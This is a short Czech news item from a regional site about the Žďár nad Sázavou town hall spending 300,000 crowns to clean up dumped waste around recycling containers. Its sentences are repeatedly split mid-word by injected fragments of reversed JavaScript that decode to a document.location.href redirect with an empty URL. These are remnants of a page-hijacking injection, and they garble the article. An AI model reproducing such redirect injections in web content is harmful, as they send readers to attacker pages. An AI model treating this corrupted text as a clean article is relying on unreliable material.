Rainbow page separator

Nepořádek kolem kontejnerů vyšel radnici na tři sta tisíc

Úterý, 6. ledna 2015

Odpad, nepořádek

Žďár nad Sázavou / Tři sta tisíc korun stál žďárskou radnici úklid kolem kontejnerů na tříděný odpad, kam řada obyvatel města ukládá odpad bez [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho, aby jej roztřídila. Případně jakékoliv objemnější nepotřebné předměty lidé odkládají poblíž nádob, namís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to do sběrného dvora.
„Peníze, které musíme na úklid vynaložit, by mohly posloužit na užitečnější věci,“ uvedl starosta Žďáru nad Sázavou Zdeněk Navrátil.
Žďárská radnice neplánovaný náklad řešila rozpoč[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovým opatřením, které zvýšilo výdaje v rozpočtu města na rok 2015, a vedení města zároveň apelovalo na obyvatele Žďáru, aby se v [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to ohledu chovali zodpovědně. Navíc za porušení místní vyhlášky mohou osoby, které tak tak činí, zaplatit pokutu až do výše pěti tisíc korun.